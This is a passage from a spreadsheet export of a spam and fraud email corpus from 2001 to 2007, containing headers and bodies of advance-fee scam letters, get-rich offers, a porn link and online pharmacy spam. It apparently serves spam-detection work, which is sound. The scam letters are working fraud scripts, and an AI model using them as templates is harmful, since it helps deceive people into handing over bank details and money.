\n  \n_FREE BONUS_ \- Respond within the next= 5 minutes and we'll give you our\nspecial report "The 5 Secrets to earni= ng $750 a day using eBay and the\nInternet".  \n  \nEverything we offered here is _free_ , = you have everything to gain and\nabsolutely nothing to lose \- so respond immediately and get started= on the\nroad to making really big money!  **\n\n**Wouldn't it be nice to tell yo= ur boss you quit?**\n\n**Spend more time with your chil= dren and family members?**\n\n**Stop dreaming about financial = freedom.   **\n\n**Make it happen!   **\n\n**We can help!=**\n\n**VISIT THE SI= TE IMMEDIATELY TO BEGIN THIS AMAZING JOURNEY INTO FINANCIAL\nINDEPENDENCE!   **\n\n**C lick here to  START YOUR JOU= RNEY! towards financial freedom ****  \n **\n\n[URL]http://www.2002marketing.com[/URL]\n\n**  \nSincerely,  \n  \nMark W. Monday  \nThe eBay Millionaire  \n**  \n  \n**C lick here to  START YOUR JOU= RNEY! towards financial freedom**\n\n[URL]http://www.2002marketing.com[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nNOTICE: Your email address was obtained from an opt-in list, **Reference #\n10023387**.  If you wish to unsubscribe from this = list, please Click Here\nand send from this e-mail address.   I= f you have previously unsubscribed and\nare still receiving this message, you may emai= l our Abuse Control Center at\nAbuse Report.  \n  \nYou received this email because you have expressed an interest in making m=\noney with eBay and or on the Internet. Click here if you would like to be\nremoved from future information.  Do= not hit reply.  Click the CLICK HERE and\nhit send to be instantly removed= .\n\n</t>
  </si>
  <si>
    <t>http://www.2002marketing.com http://www.2002marketing.com</t>
  </si>
  <si>
    <t>4780</t>
  </si>
  <si>
    <t>To: &lt;yyyy@netway.com&gt;\nFrom: "Alexandria" &lt;do1cubs7j71@hotmail.com&gt;\nDate: Tue, 07 May 2002 05:39:40 -1900</t>
  </si>
  <si>
    <t>Tue, 07 May 2002 05:39:40 -1900</t>
  </si>
  <si>
    <t>"Alexandria" &lt;do1cubs7j71@hotmail.com&gt;</t>
  </si>
  <si>
    <t>World's Biggest C*O*C*K*S....                ZEBPJ</t>
  </si>
  <si>
    <t>Get ready for the most amazing site you will ever see!\n\nClick on this link NOW!\n[URL]http://64.227.161.52[/URL]\n\n\n\n\n\n\n\n\n\n\n\n\n[URL]http://64.227.161.52[/URL]\nsheryl-lee.m</t>
  </si>
  <si>
    <t>http://64.227.161.52 http://64.227.161.52</t>
  </si>
  <si>
    <t>IND</t>
  </si>
  <si>
    <t>1875</t>
  </si>
  <si>
    <t>To: nan\nFrom: Gregory Thambo &lt;gregorythambo5@hotmail.com&gt;\nDate: Tue, 07 Mar 2006 13:05:46 +0000</t>
  </si>
  <si>
    <t>Tue, 07 Mar 2006 13:05:46 +0000</t>
  </si>
  <si>
    <t>Gregory Thambo &lt;gregorythambo5@hotmail.com&gt;</t>
  </si>
  <si>
    <t>FROM:MR.GREG THAMBO.</t>
  </si>
  <si>
    <t>FROM:MR.GREG THAMBO.\nJOHHANESBURG- 2021\nSOUTH AFRICA\nTEL:+27 73 077 5277\n\nRE-BUSINESS ENQUIRY\n\nDear Sir.\n\nI am Mr. Greg  Thambo  a South African and a senior civil servant  (General \nsupervisor) with South African Gold and Diamond Mining and Processing  \ncompany Krugersdrop, the immediate younger brother to Mr. Oliver Thambo  \n(African National Congress- ANC) who  died in Johannesburg after a long  \nillness after  he returned to South Africa in 1990 following many years\nof  living in exile, including in Tanzania , Sweden.\n\nOn the 24th April 1994, when apartheid was dismantled, the South  African  \nGovernment decided to compensate the families of all the Freedom  Fighters  \nwho lost their lives during the struggle by placing the educated elites  in  \nhigh offices in South African Government.( KNOWN AS BLACK EMPOWERMENT  \nPROGRAMME HERE IN SOUTH AFRICA) among which my family was included. For\ninstance, Nelson Mandela was compensated with being the first president of  \nthe Republic of South Africa; Richard Parkes was appointed the manager  of  \nShell and BP South Africa petroleum and refinery (S.A.P.R), Jeff Radebe  was \n  appointed the Minister of public Enterprises and Trevor Manual was  \nappointed  the Finance Minister.\n\nIn fact, I got your contact / credibility from South African  information  \nexchange assisted by the south African Chamber of Commerce and Industry  \nwhere I however read your company profile believing in its reputable  \ncapability as regards my intensive purposes to you.\n\nAs a matter of fact, I have accumulated sufficiently USD$5 MILLION(Five  \nMillion United States Dollars) by virtue of my position in the office  as a  \nsenior civil servant in the South African Gold and Diamond mining  company  \nKrugersdrop.  Presently, this fund is absolutely kept in an insurance\nsuspense holding in a private security company in South Africa. The  \ndeposition of this fund was made easier for me with a very strong written  \nagreement and signatory in a different beneficiary under my control.\n\nBeing a South Africa serving civil servant, it is very difficult for me to  \ninvest this fund here in my countrys the law strictly prohibits. If  the \ngovernment got knowledge of it, the fund will be confiscated. I have no  \ndoubt that you understand this point very well. This fund is my  struggle \nand  sweat through commissions from unaccountable contracts and other  \nprofitable  additions from the companys original cost price mostly gained \nfrom  customers around the world.\n\nTherefore, my plan and intention about this fund is to transfer it overseas \ninto a straightforward, trustworthy and God-fearing persons less taxable  \naccount for investment purpose only. Using your name/company as the  \nbeneficiary of the fund to avoid my governments intervention. Last  time, I\ngot in contact with some one from South Korea but he became  unnecessarily  \ngreedy concerning his commission in the deal before I decided to  contact  \nyou.\n\nIf you are interested in assisting me, please notify me immediately on  the \nabove private telephone number or send me e-mail on my very  confidential  \ne-mail address. But if you are not in position to assist me, please  \nmaintain  the high level of confidentiality needed in this Transaction.\n\n\nYours Faithfully.\nMr. Greg Thambo\n\n_________________________________________________________________\nIs your PC infected? Get a FREE online computer virus scan from McAfee \nSecurity. [URL]http://clinic.mcafee.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://clinic.mcafee.com</t>
  </si>
  <si>
    <t>1347</t>
  </si>
  <si>
    <t>To: david_roy@eresmas.com\nFrom: David Roy &lt;david_roy@eresmas.com&gt;\nDate: Tue, 07 Jun 2005 13:55:18 +0000</t>
  </si>
  <si>
    <t>Tue, 07 Jun 2005 13:55:18 +0000</t>
  </si>
  <si>
    <t>David Roy &lt;david_roy@eresmas.com&gt;</t>
  </si>
  <si>
    <t>david_roy@eresmas.com</t>
  </si>
  <si>
    <t>Urgent</t>
  </si>
  <si>
    <t>My Dear Friend,I have a profiling amount in an excess of US$18.2M,which I seek your partnership in accommodating for me. You will be rewarded with 30% ofthe total sum for your partnership. Can you be my partner on this? NTRODUCTION OF MY SELF:                           I am Mr.David Roy, A personal secretary to Mikhail Khodorkovskythe richest man in Russia and owner of the following companies:Chairman CEO: YUKOS OIL (Russian Most Largest Oil Company) Chairman CEO:Menatep SBP Bank (A well reputable financial institution with its branchesall over the world) SOURCE OF FUNDS The documents of the above funds in question was handed over to me to be used in payment of an American oil merchant for his last oil deal with my boss Mikhail Khodorkovsky. Already the funds have been deposited with a bank where the final crediting is expected to be carried out. While I was on the process, My Boss got arrested for his involvement on politics in financing the leading and opposing political parties (the Union of Right Forces, led by Boris Nemtsov, and Yabloko, a liberal/social democratic party led by Gregor Yavlinsky) which poses treat toPresident Vladimir Putin second tenureasRussianpresident.Youcan catchmore of the story on this [URL]http://newsfromrussia.com[/URL]  YOUR ROLE:All I need from you is to stand as the beneficiary of the above quoted sum and I will arrange for the  documentation which will enable the banktransfer the sum to you. I have decided to use this sum to relocate to American continent and never to be connected to any of Mikhail Khodorkovsky conglomerates. The transaction has to be concluded in 2 weeks As soon as I get your willingness to comply through I will giveyou more details. Thank you very much RegardsMr. David Roy Notice: This transaction does not include any up front payment</t>
  </si>
  <si>
    <t>http://newsfromrussia.com</t>
  </si>
  <si>
    <t>1345</t>
  </si>
  <si>
    <t>To: nan\nFrom: prisca_savana1 &lt;prisca_savana1@terra.com.mx&gt;\nDate: Tue, 07 Jun 2005 07:30:40 -0500</t>
  </si>
  <si>
    <t>Tue, 07 Jun 2005 07:30:40 -0500</t>
  </si>
  <si>
    <t>prisca_savana1 &lt;prisca_savana1@terra.com.mx&gt;</t>
  </si>
  <si>
    <t>urgent response</t>
  </si>
  <si>
    <t>1757</t>
  </si>
  <si>
    <t>To: nan\nFrom: sussan shubangu &lt;suzzy-shubangu1@hotmail.com&gt;\nDate: Tue, 07 Feb 2006 20:52:06 +0000</t>
  </si>
  <si>
    <t>Tue, 07 Feb 2006 20:52:06 +0000</t>
  </si>
  <si>
    <t>sussan shubangu &lt;suzzy-shubangu1@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Thank you</t>
  </si>
  <si>
    <t>&gt;From The Desk Of,\nMRS. SUSAN SHUBANGA\nDeputy Minister of Safety and Security\nSouth Africa\n\n\n\nAfter due deliberation with my children, I decided to\ncontact you for your assistance in standing as a\nbeneficiary to the some millions of dollars First,\nlet me start by introducing myself, I am MRS SUSAN SHUBANGA,\na mother of three children and the Former Deputy Minister of\nMinerals and Energy,Now Deputy Minister of Safety and Security\nunder the President of South African MR THABO\nMBEKI. You can view my profile at my website\n[URL]http://www.gov.za[/URL]\n\nAfter the swearing in ceremony making me the Deputy\nMinister of Minerals and Energy 1996 my husband Mr\nNdelebe Shabangu died while he was on an official trip to\nTrinidad and Tobago in 2002. After his death, I discovered that\nhe had some funds in a dollars with a FINANCIAL INSTITUTE.\n\nThis fund emanated as a result of an over-invoiced contract\nwhich he executed with the Government of South Africa.\nThough I assisted him in getting this contract but I never\nknew that it was over-invoiced by him. I am afraid that the\ngovernment of South Africa might start to investigate on\ncontracts awarded from 1998 to date. If they discover\nthis money in his bank account,they will confiscate it and\nseize his assets here in South Africa and this will definetely\naffect my political career in government.\n\nI want your assistance in clearing this money from the\nFinancial Institute.As soon as the fund is cleared, you are\nexpected to move it immediately into another personal\nbank account in your country.I will see to it that the\naccount is not traced from South Africa. As soon as you have\nconfirmed the fund into your account, I will send my eldest son\nwith my Attorney to come to your country to\ndiscuss on business investments.\n\nFor your assistance, I am offering you 5 Million (Five\nmillion United States Dollars Only) However, you have to\nassure me and also be ready to\ngo into agreement with\nme that you will not elope with my fund.\n\nIf you agree to my terms, kindly as a matter of\nurgency send me an email.Due to my sensitive position in the\nSouth African Government, I would not WANT you to call me on\nphone or send a fax to me. All correspondence must be by\nemail to my private email:(shubanga-suzzy@hotmail.com)\n\nIf you want to speak with my Attorney, that is fine\nand okay by me.\nHis chambers will be representing my interest\nwith you. if you show\ninterest in assisting me, i will foward\nhis contact to you and yours to him.\nI would also like you to give me your contact address i.e.\ntelephone, fax and whatever other means of communication of which to\nreach you,\nto enable my Attorney call or reach you from time to\ntime.\n\nPlease I do not need to remind you of the need for\nabsolute\nConfidentiality if this transaction must succeed. YOU\nMUST NOT CALL ME!If\nyou do not feel comfortable with this\ntransaction, do not hesitate to discontinue.\n\nThanks for your anticipated co-operation and my\nregards to your family.\n\nYours faithfully,\n\nMRS. SUSAN SHUBANGA\nDeputy Minister of Safety and Security\nSouth Africa\n\n\n\n\n</t>
  </si>
  <si>
    <t>1754</t>
  </si>
  <si>
    <t>To: nan\nFrom: Mr Ag &lt;raw_pp27@hotmail.com&gt;\nDate: Tue, 07 Feb 2006 02:37:09 +0200</t>
  </si>
  <si>
    <t>Tue, 07 Feb 2006 02:37:09 +0200</t>
  </si>
  <si>
    <t>Mr Ag &lt;raw_pp27@hotmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT TRANSACTION</t>
  </si>
  <si>
    <t>21 Hibiscus Street\nDurbanville\nCape Town\n7550\nSouth Africa.\nE-mail address: alpha2@africamail.com\n\n                            {GREETINGS AND COMPLIMENTS OF THE DAY}\nDear Sir/Madam,\n\nIn order to transfer from a Bank some amount of money, I have the courage to \nlook for a reliable and honest person who will be capable for this important \nbusiness believing that you will never let me down either now or in the \nfuture.\n\nMy name is Mr. Issa Juma, and I work in the International operation \ndepartment in a Local Bank\nhere in South Africa. On a routine inspection I discovered a dormant \ndomiciliary account with a BAL. O f 26,000,000 (Twenty Six Million USD) on \nfurther discreet investigation, I also discovered that the account holder \nhas long since passed away (dead) leaving no beneficiary to the account. The \nbank will approve this money to any foreigner because the former operator of \nthe a/c is a foreigner and from Iraq in particular and I am certainly sure \nthat he is dead, and nobody will come again for the claim of this money A \nforeigner can only claim this money with legal claims to the account Holder; \ntherefore I need your cooperation in this transaction.\n\nI will provide the necessary information needed in order to claim this \nmoney, But you will need to open an account where this can be transferred. \nIf interested send your private Telephone No. And Fax number including full \ndetails of the account to be used for the Deposit I wish for utmost\nconfidentiality in handling this transaction as my job and the future of my \nfamily would be jeopar dized if it were breached. The informationswill be as \nfollows.......\n\nBank Name:.........\nBank Address:........\nAccount Name:............\nAccount Number:.............\nSwift Code No:................\nRouting Number:..................\n\nI want to assure you that the transaction is without risk if due process is \nfollowed accordingly. Finally I will give you 25% for your corporation. I \nlook forward to a favorable response from you. through my email: \nalpha2@africamail.com\n\nBest Regards,\nMr. Issa Juma.\n\n_________________________________________________________________\nFind just what you're after on your PC with Windows Desktop Search - FREE! \n[URL]http://desktop.msn.co.za[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://desktop.msn.co.za</t>
  </si>
  <si>
    <t>3255</t>
  </si>
  <si>
    <t>To: nan\nFrom: idris makafi &lt;idris_makafi167@hotmail.fr&gt;\nDate: Tue, 07 Aug 2007 15:46:06 +0000</t>
  </si>
  <si>
    <t>Tue, 07 Aug 2007 15:46:06 +0000</t>
  </si>
  <si>
    <t>idris makafi &lt;idris_makafi167@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>AWAITING  FOR  YOUR  RESPONSE</t>
  </si>
  <si>
    <t>\nMR IDRIS MAKAFIBANK OF AFRICA. OUAGADOUGOU -BURKINA FASO. \n \nDear Friend, This message might meet you in utmost surprise, however,it's just my urgent need for foreign partner that made me to contact you for this transaction. I am a banker by profession from Burkina faso in west Africa and currently holding the post of Director Auditing and Accounting unit of the bank.I have the opportunity of transfering the left over funds ($11.5million) of one of my bank clients who died along with his entire family on 31 july 2000 in a plane crash.You can confirm the genuiness of the deceased death by clicking on this web site [URL]http://news.bbc.co.uk[/URL] \nHence,i am inviting you for a business deal where this money can be shared between us in the ratio of 60/30 while 10% will be mapped out for expenses.If you agree to my business proposal.further details of the transfer will be forwarded to you as soon as i receive your return mail. have a great day. \nyours, Mr Idris Makafi\n_________________________________________________________________\nDécouvrez Windows Live Spaces et créez votre site Web perso en quelques clics !\n[URL]http://spaces.live.com[/URL]</t>
  </si>
  <si>
    <t>3256</t>
  </si>
  <si>
    <t>To: nan\nFrom: nan\nDate: Tue, 07 Aug 2007 15:32:54 -0700</t>
  </si>
  <si>
    <t>Tue, 07 Aug 2007 15:32:54 -0700</t>
  </si>
  <si>
    <t>Yahoo! Address Book Contacts (mrsrose_mkama_200)</t>
  </si>
  <si>
    <t>&gt;From the Address Book of mrsrose_mkama_200\n\nDear,\n\nIam Mrs. Rose Mkama from Benin. I was married to Manfred The CEO Veekrol Link Benin Sarl, a seasoned Contractor In West African Region. Before he died in The year 2002. We are married for eleven years Without a child. He died after a Brief illness. After His Death I decided not tore-marry or get a child Outside My matrimonial home. When my late husband was Alive, he deposited the sum of US$31.5m dollars (US Dollars) in a Bank In Nigeria. \n\nMy Doctor told me that I would not last for the next Three months Due to cancer problem. Having known my Condition I decided to donate this funds to better the Lives of the less Privileged. I need honest and trust Worthy individual that will utilize this Money in Accordance With my instruction. I want the funds to be Used in funding religious Organizations, Orphanages And less privileged propagating the word of God. \n\nI took this decision because I don t have any child That will inherit this money and my husband relatives Are very unkind to me and I don t Want my husbands Hard-earned money to be misused. I am not afraid of Death hence I know where I am Going. I know that I Am Going to be in the bosom of the Lord. Exodus 14 VS 14 Says that the Lord will fight my course and I shall Hold my peace. I Speak French and little English in Case you want a Telephone Communication in this \nRegard.\n\nAs soon as I receive your reply I shall give you the Contact of the Bank, and my companies in Benin. For Legitimacy, I will also Issue you a letter of Authority that will empower you as the Original-Beneficiary of this fund. I want you to Always Pray for me, any delay in your Reply will give Me room in sourcing for another individual for this Same Purpose. \n\nKindly get back to me with this email ID\nmrsrose_mkama_8@sify.com\n\n\nThanks,\nYours sincerely\nMrs. Rose Mkama\n\nDo You Yahoo!?\nView your Yahoo! Address Book at [URL]http://address.yahoo.com[/URL]\nGet your free @yahoo.com address at [URL]http://mail.yahoo.com[/URL]\n\n\n  mrs rose  mkama 			[URL]http://address.yahoo.com[/URL]\n\n</t>
  </si>
  <si>
    <t>http://address.yahoo.com http://mail.yahoo.com http://address.yahoo.com</t>
  </si>
  <si>
    <t>3254</t>
  </si>
  <si>
    <t>To: nan\nFrom: QIN LI WANG &lt;buddycrk@fuse.net&gt;\nDate: Tue, 07 Aug 2007 07:08:14 -0400</t>
  </si>
  <si>
    <t>Tue, 07 Aug 2007 07:08:14 -0400</t>
  </si>
  <si>
    <t>QIN LI WANG &lt;buddycrk@fuse.net&gt;</t>
  </si>
  <si>
    <t>MY FIRST OPPORTUNITY</t>
  </si>
  <si>
    <t>Qin Li Wang\nLloyds TSB Pacific Limited \nHong Kong Branch\nTwo Exchange Square \nCentral, Hong Kong.                            \n [URL]http://www.lloydstsb.com.hk[/URL]\nAttention,\nThank you for giving me your time, I am a staff of Lloyds TSB Group Plc. here in Hong Kong attached in Private Banking Services, I amcontacting you concerning a customer and an investment placed under our banksmanagement; as a matter of fact it was 3 years ago. In 2004, the subjectmatter; Ref: FI/TSB/958/042/0500 came to our bank to engage inbusiness discussions with our Private Banking Services Department. He informed us that he had a financial portfolio of 14.37 million United\n StatesDollars, I was the officer assigned to his case;  In line with instructions,the money was deposited; he told me he wanted the money there in anticipation of his arrival from Norway later that week. This was the last communication we had, this transpired around February 25th 2004. I made\n futile efforts to locate him I immediately  Four days later, information started to trickle in, that he was apparently dead, a person who suited his description was declared dead of a heart attack in Cannes, South of France. it is only an outsider to the banking world who finds the internal politics of the banking world aberrational. There isUSD$13,991,674(Thirteen million, nine hundred and ninety one thousand, six hundred and seventy four united states dollars) deposited, I alone have thedeposit details and they will release the deposit to no one unless Iinstruct them to do so. My proposal; I am prepared to place you in a position whereby an instruction is given to the finance firm to officially release the deposit to you as the closest surviving relation/associate,and all etiquette shall be done in accordance with the rule of law, Iwillsimply nominate you as the next of kin and have them release the deposit to you; afterwards we share the proceeds 50/50. I would have gone ahead to ask the funds be released to me, but that would have drawn a straight line to me and my involvement in claiming the deposit, If you\nfindyourself interested to work with me,please contact me specifically,through this email account sirqinwang@netscape.net. It is necessarytoinform you thatunder no condition should you contact me via official channels\nI await your response.\nYours Sincerely,\nQin Li Wang\n\nQin Li Wang\nLloyds TSB Pacific Limited \nHong Kong Branch\nTwo Exchange Square \nCentral, Hong Kong.                            \n [URL]http://www.lloydstsb.com.hk[/URL]\nAttention,\nThank you for giving me your time, I am a staff of Lloyds TSB Group Plc. here in Hong Kong attached in Private Banking Services, I amcontacting you concerning a customer and an investment placed under our banksmanagement; as a matter of fact it was 3 years ago. In 2004, the subjectmatter; Ref: FI/TSB/958/042/0500 came to our bank to engage inbusiness discussions with our Private Banking Services Department. He informed us that he had a financial portfolio of 14.37 million United\n StatesDollars, I was the officer assigned to his case;  In line with instructions,the money was deposited; he told me he wanted the money there in anticipation of his arrival from Norway later that week. This was the last communication we had, this transpired around February 25th 2004. I made\n futile efforts to locate him I immediately  Four days later, information started to trickle in, that he was apparently dead, a person who suited his description was declared dead of a heart attack in Cannes, South of France. it is only an outsider to the banking world who finds the internal politics of the banking world aberrational. There isUSD$13,991,674(Thirteen million, nine hundred and ninety one thousand, six hundred and seventy four united states dollars) deposited, I alone have thedeposit details and they will release the deposit to no one unless Iinstruct them to do so. My proposal; I am prepared to place you in a position whereby an instruction is given to the finance firm to officially release the deposit to you as the closest surviving relation/associate,and all etiquette shall be done in accordance with the rule of law, Iwillsimply nominate you as the next of kin and have them release the deposit to you; afterwards we share the proceeds 50/50. I would have gone ahead to ask the funds be released to me, but that would have drawn a straight line to me and my involvement in claiming the deposit, If you\nfindyourself interested to work with me,please contact me specifically,through this email account sirqinwang@netscape.net. It is necessarytoinform you thatunder no condition should you contact me via official channels\nI await your response.\nYours Sincerely,\nQin Li Wang\n\nQin Li Wang\nLloyds TSB Pacific Limited \nHong Kong Branch\nTwo Exchange Square \nCentral, Hong Kong.                            \n [URL]http://www.lloydstsb.com.hk[/URL]\nAttention,\nThank you for giving me your time, I am a staff of Lloyds TSB Group Plc. here in Hong Kong attached in Private Banking Services, I amcontacting you concerning a customer and an investment placed under our banksmanagement; as a matter of fact it was 3 years ago. In 2004, the subjectmatter; Ref: FI/TSB/958/042/0500 came to our bank to engage inbusiness discussions with our Private Banking Services Department. He informed us that he had a financial portfolio of 14.37 million United\n StatesDollars, I was the officer assigned to his case;  In line with instructions,the money was deposited; he told me he wanted the money there in anticipation of his arrival from Norway later that week. This was the last communication we had, this transpired around February 25th 2004. I made\n futile efforts to locate him I immediately  Four days later, information started to trickle in, that he was apparently dead, a person who suited his description was declared dead of a heart attack in Cannes, South of France. it is only an outsider to the banking world who finds the internal politics of the banking world aberrational. There isUSD$13,991,674(Thirteen million, nine hundred and ninety one thousand, six hundred and seventy four united states dollars) deposited, I alone have thedeposit details and they will release the deposit to no one unless Iinstruct them to do so. My proposal; I am prepared to place you in a position whereby an instruction is given to the finance firm to officially release the deposit to you as the closest surviving relation/associate,and all etiquette shall be done in accordance with the rule of law, Iwillsimply nominate you as the next of kin and have them release the deposit to you; afterwards we share the proceeds 50/50. I would have gone ahead to ask the funds be released to me, but that would have drawn a straight line to me and my involvement in claiming the deposit, If you\nfindyourself interested to work with me,please contact me specifically,through this email account sirqinwang@netscape.net. It is necessarytoinform you thatunder no condition should you contact me via official channels\nI await your response.\nYours Sincerely,\nQin Li Wang\n\nQin Li Wang\nLloyds TSB Pacific Limited \nHong Kong Branch\nTwo Exchange Square \nCentral, Hong Kong.                            \n [URL]http://www.lloydstsb.com.hk[/URL]\nAttention,\nThank you for giving me your time, I am a staff of Lloyds TSB Group Plc. here in Hong Kong attached in Private Banking Services, I amcontacting you concerning a customer and an investment placed under our banksmanagement; as a matter of fact it was 3 years ago. In 2004, the subjectmatter; Ref: FI/TSB/958/042/0500 came to our bank to engage inbusiness discussions with our Private Banking Services Department. He informed us that he had a financial portfolio of 14.37 million United\n StatesDollars, I was the officer assigned to his case;  In line with instructions,the money was deposited; he told me he wanted the money there in anticipation of his arrival from Norway later that week. This was the last communication we had, this transpired around February 25th 2004. I made\n futile efforts to locate him I immediately  Four days later, information started to trickle in, that he was apparently dead, a person who suited his description was declared dead of a heart attack in Cannes, South of France. it is only an outsider to the banking world who finds the internal politics of the banking world aberrational. There isUSD$13,991,674(Thirteen million, nine hundred and ninety one thousand, six hundred and seventy four united states dollars) deposited, I alone have thedeposit details and they will release the deposit to no one unless Iinstruct them to do so. My proposal; I am prepared to place you in a position whereby an instruction is given to the finance firm to officially release the deposit to you as the closest surviving relation/associate,and all etiquette shall be done in accordance with the rule of law, Iwillsimply nominate you as the next of kin and have them release the deposit to you; afterwards we share the proceeds 50/50. I would have gone ahead to ask the funds be released to me, but that would have drawn a straight line to me and my involvement in claiming the deposit, If you\nfindyourself interested to work with me,please contact me specifically,through this email account sirqinwang@netscape.net. It is necessarytoinform you thatunder no condition should you contact me via official channels\nI await your response.\nYours Sincerely,\nQin Li Wang\n\n\n</t>
  </si>
  <si>
    <t>http://www.lloydstsb.com.hk http://www.lloydstsb.com.hk http://www.lloydstsb.com.hk http://www.lloydstsb.com.hk</t>
  </si>
  <si>
    <t>4681</t>
  </si>
  <si>
    <t>To: funkelo@mail1st.com\nFrom: jsimmons2003@yahoo.com\nDate: Tue, 07 Aug 2001 06:08:19 -0800</t>
  </si>
  <si>
    <t>Tue, 07 Aug 2001 06:08:19 -0800</t>
  </si>
  <si>
    <t>jsimmons2003@yahoo.com</t>
  </si>
  <si>
    <t>funkelo@mail1st.com</t>
  </si>
  <si>
    <t>Prescriptions Without Doctors Appointment!!</t>
  </si>
  <si>
    <t>The Internet's Online Pharmacy\n\nViagra - Xenical - Propecia - Claritin - Celbrex - Renova - Zyban\n\nNow get your prescriptions approved by a panel of licensed medical doctors online without the need for an office visit.\n\nAfter approval of the doctor the medication will be shipped right to your door.\n\nVisit The Internets Online Pharmacy by clicking the link below:\n\n [URL]http://host.1bulk-email-software.com[/URL]\n\nTo be removed from future mailings send an email to unlist4me@yahoo.com with remove in the subject</t>
  </si>
  <si>
    <t>http://host.1bulk-email-software.com</t>
  </si>
  <si>
    <t>172</t>
  </si>
  <si>
    <t>To: webmaster@aclweb.org\nFrom: Owen Mubane &lt;muowen^%&amp;@mmail.com&gt;\nDate: Tue, 06 May 2003 21:02:50 +0200</t>
  </si>
  <si>
    <t>Tue, 06 May 2003 21:02:50 +0200</t>
  </si>
  <si>
    <t>Owen Mubane &lt;muowen^%&amp;@mmail.com&gt;</t>
  </si>
  <si>
    <t>AWAITING YOUR RESPONES</t>
  </si>
  <si>
    <t xml:space="preserve">Good Day,\n\n\nWith warm heart I offer my friendship, and my greetings, and I hope\nthis letter meets you in good time. It will be surprising  to you to\nreceive this proposal from me since you do not know me personally.\nHowever, I am sincerely seeking your confidence in this transaction,\nwhich I propose with my free mind and as a person of integrity.  My name\nis  Owen Mubane, the first son of Mapele Mubane, of the  most popular\nblack farmer  from Zimbabwe, murdered in the land  dispute in my\ncountry. As led by my instict, I decided to contact you  through email,\nafter searching  for contacts via the internet, as it  is the only means\nI can contact anybody since I am cutting off ties  with Zimbabwe for\nsecurity and safety reasons.  However, I apologize  if this is not\nacceptable to you.\n\n\nThe purpose of this letter is to seek your most needed assistance in  a\nbusiness venture. Due to the land and political problems in  Zimbabwe,\nas a result of President Robert Mugabe's introduction of  new Land Act\nReform wholly affecting the rich white farmers and the  few rich black\nfarmers, and his desire to hold on to power for life,  my father for saw\nthe danger that came in Zimbabwe. Before he was  murdered, he withdrew\nall of our business foreign accounts in dollars  and sold up our shares\nin major companies. We then went to  SOUTH AFRICA  to deposit the sum of\nUS$14.5 million  (Fourteen million, Five Hundred thousand US dollars),\nin a private  security company. This money was deposited with this\nPrivate Security  company for safety and security reasons, and  was to\nbe used for the  purchase of land, new machines and chemicals\nestablishment of new  farms in Europe.\n\n\nPresident Mugabe's support for the violent  Zimbabwean war veterans  and\nsome lunatics in the society, led to the murder of my beloved  father\nand other innocent lives. I was continually threatened to  abandon my\ninheritance from my father after he was murdered. I  resited for a\nwhile, but when the danger became unbearable, and I  survived two murder\nattempts, I fled Zimbabwe.  I am currently staying in the Netherlands\nwhere I am seeking  political asylum. In fact my decision to come here\nto seek asylum, is  because the security company from South Africa, has\na branch here,  and they have moved the deposit from their office in\nJohannesburg down  here. I need to transfer this money to  an account\nand invest part of  the money. Since the law of Netherlands prohibits a\nrefugee (asylum seeker) to open any bank account or to be involved in any financial\ntransaction, this is why  I am seeking a genuine and reliable  partner,\nwhose account this money can be transferred, hence this  proposal to\nyou.You have to understand that this decision taken by me  entrusts my\nfuture and in your hands, as a result of the safe keeping  of this\nmoney. If you accept to assist me, all I want you to do for  me, is to\nassist with arrangements to claim the deposit from the  security company\nfrom their office here in The Netherlands, as it has  now been\ntransfered from Johannesburg, South Afri!  ca to their branch here. The\ncompany will be legally informed of you  representing me.\n\n\nFor your assistance, I have two options for you. Firstly you can\nchoose to have 10% of the money for your assistance, and helping me\nopen an account for the money to be deposited here, or you can go  into\npartnership with me for the proper profitable investment of the  money\nin your country. Whichever the option you want, please to  notify me in\nyour reply.  I have also set aside 1%($145,000,00) of this money for all\nkinds of  expenses that come our way in the process of this transaction,\nand 4% ($580,000,00) for Charity donation. If you prefer to accept the 10%\nfor assisting with opening an account, then 85%will be left in the\naccount here for me.\n\nPlease, I want you maintain the absolute secrecy for the purpose  of\nthis transaction.  I look forward to your reply and co-operation, and I\nthank you in  advance as I anticipate your co-operation.You can reach me\non my  direct line which is 31 617 562  914 or via email\nowenmubane1000@rediffmail.com. \n\n Sincerely, \n\n Owen Mubane.  \n\n\nNOTE:  YOU CAN READ ABOUT PROBLEMS IN ZIMBABWE FROM \nTHE LINKS BELOW\n\n\n[URL]http://www.1freespace.com[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]\n[URL]http://news.bbc.co.uk[/URL]  </t>
  </si>
  <si>
    <t>http://www.1freespace.com http://news.bbc.co.uk http://news.bbc.co.uk http://news.bbc.co.uk</t>
  </si>
  <si>
    <t>2175</t>
  </si>
  <si>
    <t>To: nan\nFrom: bruce nelson &lt;bsatlaw1@hotmail.com&gt;\nDate: Tue, 06 Jun 2006 17:16:51 +0000</t>
  </si>
  <si>
    <t>Tue, 06 Jun 2006 17:16:51 +0000</t>
  </si>
  <si>
    <t>bruce nelson &lt;bsatlaw1@hotmail.com&gt;</t>
  </si>
  <si>
    <t>event of the accident</t>
  </si>
  <si>
    <t>\n\n\n\nFROM THE DESK OF: BARRISTER BRUCE NELSON SMITH.\nCHAMBER: BRUCE SMITH &amp; ASSOCIATES\n19 KINGSWAY ROAD, IKOYI LAGOS NIGERIA.\nDear Friend\nI am Barrister and a Solicitor. I am the Personal Attorney to Dr Adams, a \nnational of your country, who used to work with CADBURY NIGERIA LIMITED, on \nthe 21st of April 2004, my client, his wife and their three children were \ninvolved in a car accident along Sagamu Lagos Express Road.\nUnfortunately they All lost their lives in the event of the accident,\nSince then I have made several enquiries to your Embassy to locate any of my \nclients extended relatives, this has also proved unsuccessful. After these \nseveral unsuccessful attempts, I decided to trace his elatives over the \nInternet to locate any member of his family but of no avail, hence I \ncontacted you. I contacted you to assist in retrieving the money and \nproperty left behind by my client before they get confiscated or declared \nunserviceable by the bank where this huge deposit were lodged.\nParticularly, the Bank where the deceased had an account valued at about \nUS$10.5M (Ten Million Five Hundred Thousand United Stated \ndollars).Consequently, the bank issued me a notice to provide the next of \nkin or have the account confiscated. Since I have been unsuccessful in \nlocating the relatives for over 2 years now.\nI seek your consent to help me in the search of the next of kin of the \ndeceased or will you accept the offer to stand as the next of kin 